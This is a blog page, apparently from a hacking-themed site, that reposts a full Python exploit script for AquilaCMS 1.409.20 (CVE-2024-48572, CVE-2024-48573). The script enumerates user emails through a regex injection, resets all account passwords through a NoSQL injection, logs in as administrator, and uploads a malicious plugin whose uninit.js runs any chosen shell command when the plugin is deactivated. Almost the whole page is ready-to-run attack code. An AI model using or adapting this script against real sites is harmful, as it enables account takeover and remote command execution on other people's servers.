Jump to content
  • Entries

    16114
  • Comments

    7952
  • Views

    863106812

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

# Exploit Title: AquilaCMS 1.409.20 - Remote Command Execution (RCE)
# Date: 2024-10-25
# Exploit Author: Eui Chul Chung
# Vendor Homepage: https://www.aquila-cms.com/
# Software Link: https://github.com/AquilaCMS/AquilaCMS
# Version: v1.409.20
# CVE: CVE-2024-48572, CVE-2024-48573


import io
import json
import uuid
import string
import zipfile
import argparse
import requests
import textwrap


def unescape_special_characters(email):
    return (
        email.replace("[$]", "$")
        .replace("[*]", "*")
        .replace("[+]", "+")
        .replace("[-]", "-")
        .replace("[.]", ".")
        .replace("[?]", "?")
        .replace(r"[\^]", "^")
        .replace("[|]", "|")
    )


def get_user_emails():
    valid_characters = list(
        string.ascii_lowercase + string.digits + "!#%&'/=@_`{}~"
    ) + ["[$]", "[*]", "[+]", "[-]", "[.]", "[?]", r"[\^]", "[|]"]

    emails_found = []

    next_emails = ["^"]
    while next_emails:
        prev_emails = next_emails
        next_emails = []

        for email in prev_emails:
            found = False
            for ch in valid_characters:
                data = {"email": f"{email + ch}.*"}
                res = requests.put(f"{args.url}/api/v2/user", json=data)

                if json.loads(res.text)["code"] == "UserAlreadyExist":
                    next_emails.append(email + ch)
                    found = True

            if not found:
                emails_found.append(email[1:])
                print(f"[+] {unescape_special_characters(email[1:])}")

    return emails_found


def reset_password(email):
    data = {"email": email}
    requests.post(f"{args.url}/api/v2/user/resetpassword", json=data)

    data = {"token": {"$ne": None}, "password": args.password}
    requests.post(f"{args.url}/api/v2/user/resetpassword", json=data)

    print(f"[+] {unescape_special_characters(email)} : {args.password}")


def get_admin_auth_token(emails):
    for email in emails:
        data = {"username": email, "password": args.password}
        res = requests.post(f"{args.url}/api/v2/auth/login/admin", json=data)

        if res.status_code == 200:
            print(f"[+] Administrator account : {unescape_special_characters(email)}")
            return json.loads(res.text)["data"]

    return None


def create_plugin(plugin_name):
    payload = textwrap.dedent(
        f"""
    const {{ exec }} = require("child_process");

    /**
     * This function is called when the plugin is desactivated or when we delete it
     */
    module.exports = async function (resolve, reject) {{
      try {{
        exec("{args.command}");
        return resolve();
      }} catch (error) {{}}
    }};
    """
    ).strip()

    plugin = io.BytesIO()
    with zipfile.ZipFile(plugin, "a", zipfile.ZIP_DEFLATED, False) as zip_file:
        zip_file.writestr(
            f"{plugin_name}/package.json",
            io.BytesIO(f'{{ "name": "{plugin_name}" }}'.encode()).getvalue(),
        )
        zip_file.writestr(
            f"{plugin_name}/info.json", io.BytesIO(b'{ "info": {} }').getvalue()
        )
        zip_file.writestr(
            f"{plugin_name}/uninit.js", io.BytesIO(payload.encode()).getvalue()
        )

    plugin.seek(0)
    return plugin


def rce(emails):
    auth_token = get_admin_auth_token(emails)
    if auth_token is None:
        print("[-] Administrator account not found")
        return

    print("[+] Create malicious plugin")
    plugin_name = uuid.uuid4().hex
    plugin = create_plugin(plugin_name)

    print("[+] Upload plugin")
    headers = {"Authorization": auth_token}
    files = {"file": (f"{plugin_name}.zip", plugin, "application/zip")}
    requests.post(f"{args.url}/api/v2/modules/upload", headers=headers, files=files)

    print("[+] Find uploaded plugin")
    headers = {"Authorization": auth_token}
    data = {"PostBody": {"limit": 0}}
    res = requests.post(f"{args.url}/api/v2/modules", headers=headers, json=data)

    plugin_id = None
    for data in json.loads(res.text)["datas"]:
        if data["name"] == plugin_name:
            plugin_id = data["_id"]
            print(f"[+] Plugin ID : {plugin_id}")
            break

    if plugin_id is None:
        print("[-] Plugin not found")
        return

    print("[+] Deactivate plugin")
    headers = {"Authorization": auth_token}
    data = {"idModule": plugin_id, "active": False}
    res = requests.post(f"{args.url}/api/v2/modules/toggle", headers=headers, json=data)

    if res.status_code == 200:
        print("[+] Command execution succeeded")
    else:
        print("[-] Command execution failed")


def main():
    print("[*] Retrieve email addresses")
    emails = get_user_emails()

    print("\n[*] Reset password")
    for email in emails:
        reset_password(email)

    print("\n[*] Perform remote code execution")
    rce(emails)


if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument(
        "-u",
        dest="url",
        help="Site URL (e.g. www.aquila-cms.com)",
        type=str,
        required=True,
    )
    parser.add_argument(
        "-p",
        dest="password",
        help="Password to use for password reset (e.g. HaXX0r3d!)",
        type=str,
        default="HaXX0r3d!",
    )
    parser.add_argument(
        "-c",
        dest="command",
        help="Command to execute (e.g. touch /tmp/pwned)",
        type=str,
        default="touch /tmp/pwned",
    )
    args = parser.parse_args()

    main()